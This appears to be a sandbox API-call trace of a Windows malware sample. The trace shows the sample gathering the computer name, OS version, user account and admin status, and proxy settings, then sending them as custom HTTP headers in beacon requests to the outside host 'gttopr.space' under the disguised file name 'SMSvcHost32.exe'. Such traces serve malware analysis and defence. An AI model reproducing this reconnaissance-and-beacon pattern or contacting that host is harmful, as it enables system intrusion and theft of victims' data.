	[0123.229] wsprintfW (in: param_1=0x396d0f0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0123.229] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0123.229] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0123.229] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0123.229] wsprintfW (in: param_1=0x396d0f0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.229] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0123.229] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0123.229] wsprintfW (in: param_1=0x396d0f0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0123.229] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0123.229] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0123.230] CloseHandle (hObject=0x69c) returned 1
	[0123.230] CloseHandle (hObject=0xffffffff) returned 1
	[0123.230] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39ab340*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x186772d, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39ab3d7, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0123.233] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.233] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0123.233] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0123.233] NetApiBufferFree (Buffer=0x39ab340) returned 0x0
	[0123.233] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0123.234] wsprintfW (in: param_1=0x396d0f0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0123.234] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0123.234] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0123.234] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0123.234] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0123.234] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0123.234] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0123.234] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x424) returned 0x0
	[0123.234] RegQueryValueExW (in: hKey=0x424, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0123.234] RegCloseKey (hKey=0x424) returned 0x0
	[0123.234] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0123.234] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0123.234] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0123.234] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0
	[0124.738] GetLastError () returned 0x2efd
	[0124.738] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x702b0000
	[0124.738] FormatMessageA (in: dwFlags=0x1b00, lpSource=0x702b0000, dwMessageId=0x2efd, dwLanguageId=0x0, lpBuffer=0x205f8d8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\xd8\xce\x96\x03") returned 0x37
	[0124.739] LocalFree (hMem=0x396ced8) returned 0x0
	[0124.739] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0124.739] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0124.739] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0124.740] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/21000101 Firefox/25.0", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
	[0124.740] InternetConnectA (hInternet=0xcc0004, lpszServerName="gttopr.space", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008
	[0124.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x205fe8c, cbMultiByte=-1, lpWideCharStr=0x6e1db8, cchWideChar=22 | out: lpWideCharStr="/rpersist4/1197631235") returned 22
	[0124.740] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/rpersist4/1197631235", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84800300, dwContext=0x0) returned 0xcc000c
	[0124.740] wsprintfW (in: param_1=0x396d0f0, param_2="X-File-Name: %s" | out: param_1="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0124.740] lstrlenW (lpString="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned 65
	[0124.740] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-File-Name: C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwHeadersLength=0x41, dwModifiers=0x10000000) returned 1
	[0124.741] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x6897e0, nSize=0x205f2bc | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x205f2bc) returned 0x1
	[0124.741] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Name: %s" | out: param_1="X-User-Name: X2VS1CUM\\Nd9E1FYi") returned 30
	[0124.742] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Name: X2VS1CUM\\Nd9E1FYi", dwHeadersLength=0x1e, dwModifiers=0x10000000) returned 1
	[0124.742] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c4 | out: phkResult=0x205f2c4*=0x424) returned 0x0
	[0124.742] RegQueryValueExW (in: hKey=0x424, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0124.742] RegQueryValueExW (in: hKey=0x424, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0124.742] RegQueryValueExW (in: hKey=0x424, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f29c*=0x0) returned 0x2
	[0124.742] RegCloseKey (hKey=0x424) returned 0x0
	[0124.742] wsprintfW (in: param_1=0x396d0f0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0124.742] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0124.742] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0124.742] GetVersionExW (in: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x205f2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0124.743] wsprintfW (in: param_1=0x396d0f0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0124.743] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0124.743] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0124.743] wsprintfW (in: param_1=0x396d0f0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0124.743] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0124.743] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0124.744] CloseHandle (hObject=0x424) returned 1
	[0124.744] CloseHandle (hObject=0xffffffff) returned 1
	[0124.744] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x205f2c4 | out: bufptr=0x39abdc0*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x186772e, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x39abe57, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0124.749] wsprintfW (in: param_1=0x396d0f0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0124.749] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0124.749] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0124.749] NetApiBufferFree (Buffer=0x39abdc0) returned 0x0
	[0124.750] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x205f1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0124.750] wsprintfW (in: param_1=0x396d0f0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0124.750] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0124.750] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0124.750] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-HTTP-Agent: WININET", dwHeadersLength=0x15, dwModifiers=0x10000000) returned 1
	[0124.750] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Present: FALSE", dwHeadersLength=0x16, dwModifiers=0x10000000) returned 1
	[0124.750] lstrlenW (lpString="X-Proxy-Used: FALSE") returned 19
	[0124.750] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-Used: FALSE", dwHeadersLength=0x13, dwModifiers=0x10000000) returned 1
	[0124.750] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x205f2c8 | out: phkResult=0x205f2c8*=0x6a0) returned 0x0
	[0124.750] RegQueryValueExW (in: hKey=0x6a0, lpValueName="AutoDetect", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x205f2cc*=0x0) returned 0x2
	[0124.750] RegCloseKey (hKey=0x6a0) returned 0x0
	[0124.751] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-Proxy-AutoDetect: FALSE", dwHeadersLength=0x19, dwModifiers=0x10000000) returned 1
	[0124.751] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc | out: lpBuffer=0x205fb1c, lpdwBufferLength=0x205fafc) returned 1
	[0124.751] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x205fb1c, dwBufferLength=0x4) returned 1
	[0124.751] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0, dwOptionalLength=0x0) returned 0
	[0126.353] GetLastError () returned 0x2efd
	[0126.353] GetModuleHandleA (lpModuleName="wininet.dll") returned 0x702b0000
	[0126.353] FormatMessageA (in: dwFlags=0x1b00, lpSource=0x702b0000, dwMessageId=0x2efd, dwLanguageId=0x0, lpBuffer=0x205f8d8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x18Ð\x96\x03") returned 0x37
	[0126.353] LocalFree (hMem=0x396d018) returned 0x0
	[0126.353] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0126.354] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0126.354] InternetCloseHandle (hInternet=0xcc0004) returned 1

Thread:
	id = 102
	os_tid = 0xa54

	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetCurrentProcessId () returned 0x934
	[0088.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x934) returned 0x1ec
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.096] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] OpenProcessToken (in: ProcessHandle=0x1ec, DesiredAccess=0x20008, TokenHandle=0x286ff0c | out: TokenHandle=0x286ff0c*=0x20c) returned 1
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.097] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] GetLastError () returned 0x57
	[0088.098] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x765a0000
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetProcAddress (hModule=0x765a0000, lpProcName="ProcessIdToSessionId") returned 0x765b8fa0
	[0088.099] ProcessIdToSessionId (in: dwProcessId=0x934, pSessionId=0x286fe28 | out: pSessionId=0x286fe28) returned 1
	[0088.099] FreeLibrary (hLibModule=0x765a0000) returned 1
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.099] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetLastError () returned 0x57
	[0088.100] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x286ff00 | out: TokenInformation=0x0, ReturnLength=0x286ff00) returned 0
	[0088.100] GetLastError () returned 0x7a
	[0088.100] GetTokenInformation (in: TokenHandle=0x20c, TokenInformationClass=0x1, TokenInformation=0x65a2f0, TokenInformationLength=0x24, ReturnLength=0x286ff00 | out: TokenInformation=0x65a2f0, ReturnLength=0x286ff00) returned 1
	[0088.100] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x65a2f8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x69d730, cchName=0x286fe58, ReferencedDomainName=0x69d940, cchReferencedDomainName=0x286fe5c, peUse=0x286fe54 | out: Name="Nd9E1FYi", cchName=0x286fe58, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x286fe5c, peUse=0x286fe54) returned 1
	[0088.101] GetLastError () returned 0x0
	[0088.101] GetLastError () returned 0x0
	[0088.101] GetLastError () returned 0x0
	[0088.101] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.102] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
	[0088.103] GetLastError () returned 0x0
